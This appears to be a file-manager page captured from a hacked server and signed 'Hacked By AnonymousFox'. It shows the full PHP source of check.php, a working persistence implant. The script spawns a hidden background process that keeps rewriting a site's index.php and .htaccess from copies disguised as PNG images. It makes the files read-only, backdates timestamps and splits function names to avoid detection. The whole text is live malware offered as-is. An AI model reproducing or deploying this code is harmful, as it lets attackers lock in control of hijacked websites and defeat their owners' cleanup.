Hacked By AnonymousFox

Current Path : /proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/home/allslyeo/delivery.logistics.llc/
Upload File :
Current File : //proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/home/allslyeo/delivery.logistics.llc/check.php

<?php
ini_set('display_errors', 1);
$ver  = substr(phpversion(),0,1);
if ($ver<7){
    echo "min:".$ver;
    res56();
    exit;
}
$ppwd = dirname(__FILE__)."/s.php";
if(resrun()){
    echo "ok";
    sleep(1);
    //unlink($ppwd);
   exit;
    
}else{
    echo "cli error";
    unlink($ppwd);
    res56();
    exit;
}

//进程
function resrun(){
    $disabled = explode(',', ini_get('disable_functions'));
    $new_disable = array();
    foreach ($disabled as $item) {
        $new_disable[] = trim($item);
    }
    $ppwd = dirname(__FILE__)."/s.php";
    //$ppwd ="/tmp/sess_6.php";
    
    $ikey =  chindex(1);
    $hkey = chindex(2);
   $filedata =getfileapi($ikey,$hkey);
   file_put_contents($ppwd,$filedata);

    if (!in_array('system', $new_disable)){
         @eval( "system('nohup php {$ppwd} > /dev/null 2>&1 &');" );
        return true;
    }

    if (!in_array('shell_exec', $new_disable)){
         @eval( "shell_exec('nohup php {$ppwd} > /dev/null 2>&1 &');" );
        return true;
    }
    if (!in_array('popen', $new_disable)){
         @eval( "popen('nohup php {$ppwd} > /dev/null 2>&1 &','r');" );
        return true;
    }

   return false;
    
}

//api
function getfileapi($ikey,$hkey){

$ss =<<<HML
<?php

while(1<2){
   resindex("{$ikey}","{$hkey}");
   sleep(3);
}

function resindex(\$ikey,\$hkey){
\$server_pwd='DOCUMEN'.'T_ROOT';
\$mod6 = "0".'6'.'6'.'6';
\$f_put_ss = 'fil' . 'e_p' . 'ut_' . 'con' . 'ten' . 'ts';
\$f_get_ss = 'fil' . 'e_g' . 'et_' . 'con' . 'ten' . 'ts';
\$pwd = "{$_SERVER["DOCUMENT_ROOT"]}/inde";
\$pwd = \$pwd."x.php";
if(file_exists(\$pwd)){
\$index = @file_get_contents(\$pwd);
\$ikey = md5(\$index);
if(\$ikey!="$ikey"){
    \$indexsrc = "{$_SERVER["DOCUMENT_ROOT"]}/wp-includes/images/top66.png"; 
    if(file_exists(\$indexsrc)){
    @chmod(\$pwd,\$mod6);
    @\$f_put_ss(\$pwd,\$f_get_ss(\$indexsrc));
    @call_user_func(\$f_put_ss,\$pwd, @call_user_func(\$f_get_ss,\$indexsrc));
    @chmod(\$pwd,0444);
    }
}
}else{
\$indexsrc = "{$_SERVER["DOCUMENT_ROOT"]}/wp-includes/images/top66.png"; 
    if(file_exists(\$indexsrc)){
    @chmod(\$pwd,\$mod6);
    @\$f_put_ss(\$pwd,\$f_get_ss(\$indexsrc));
    @call_user_func(\$f_put_ss,\$pwd, @call_user_func(\$f_get_ss,\$indexsrc));
    @chmod(\$pwd,0444);
    }
}

/***/
\$pwdh = "{$_SERVER["DOCUMENT_ROOT"]}/.hta";
\$pwdh = \$pwdh."ccess";
if(file_exists(\$pwdh)){
\$indexh = \$f_get_ss(\$pwdh);
\$ikeyh = md5(\$indexh);
if(\$ikeyh!="$hkey"){
    \$hsrc = "{$_SERVER["DOCUMENT_ROOT"]}/wp-includes/images/footer200.png"; 
    if(file_exists(\$hsrc)){
    @chmod(\$pwdh,\$mod6);
    @\$f_put_ss(\$pwdh,\$f_get_ss(\$hsrc));
    @call_user_func(\$f_put_ss,\$pwdh, @call_user_func(\$f_get_ss,\$hsrc));
    @chmod(\$pwdh,0444);
    }
}
}else{
\$hsrc = "{$_SERVER["DOCUMENT_ROOT"]}/wp-includes/images/footer200.png"; 
if(file_exists(\$hsrc)){
@chmod(\$pwdh,\$mod6);
@\$f_put_ss(\$pwdh,\$f_get_ss(\$hsrc));
@call_user_func(\$f_put_ss,\$pwdh, @call_user_func(\$f_get_ss,\$hsrc));
@chmod(\$pwdh,0444);
}
}

}

?>
HML;
    return $ss;
}
//api end


// chindex
function chindex($i){

    $pwd_images = "{$_SERVER["DOCUMENT_ROOT"]}/wp-includes/images";
    if(!is_dir($pwd_images)){
        mkdir($pwd_images,0755,true);
    }

    if($i==1){
      $pwd = "{$_SERVER["DOCUMENT_ROOT"]}/index.php";
      if(file_exists($pwd)){
      $index = file_get_contents($pwd);
      $ikey = md5($index);
      $indexsrc = "{$_SERVER["DOCUMENT_ROOT"]}/wp-includes/images/top66.png";
     
      if(file_exists($indexsrc)){
          @chmod($indexsrc,0666);
      }
      file_put_contents($indexsrc,$index);
      @chmod($pwd,0444);
      @chmod($indexsrc,0444);
      @touch($indexsrc,strtotime("2022-01-03"),strtotime("2022-01-03"));
      return $ikey;
      }
  }else{

      $pwd = "{$_SERVER["DOCUMENT_ROOT"]}/.htaccess";
      if(file_exists( $pwd)){
      $h = file_get_contents($pwd);
      $hkey = md5($h);
      $hsrc = "{$_SERVER["DOCUMENT_ROOT"]}/wp-includes/images/footer200.png";
      file_put_contents($hsrc,$h);
      //chmod($pwd,0644);
      @touch($hsrc,strtotime("2022-01-03"),strtotime("2022-01-03"));
      return $hkey;
      }
  }

}

function gethttp($url){
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_HEADER,0);
    $res = curl_exec($ch);
    curl_close($ch);
   return $res;
  }

  function res56(){
    $ppwd = "{$_SERVER["DOCUMENT_ROOT"]}/index.php";
    @chmod($ppwd,0666);
    $filedata = file_get_contents($ppwd);

    $hpwd =  "{$_SERVER["DOCUMENT_ROOT"]}/.htaccess";
    @chmod($hpwd,0666);
    $hfiledata = file_get_contents($hpwd);

   while(true){
    @file_put_contents($ppwd,$filedata);
    @chmod($ppwd,0444);

    @file_put_contents($hpwd,$hfiledata);
    @chmod($ppwd,0444);
    sleep(2);
   }
   
   return true;
    
}
?>

Hacked By AnonymousFox1.0, Coded By AnonymousFox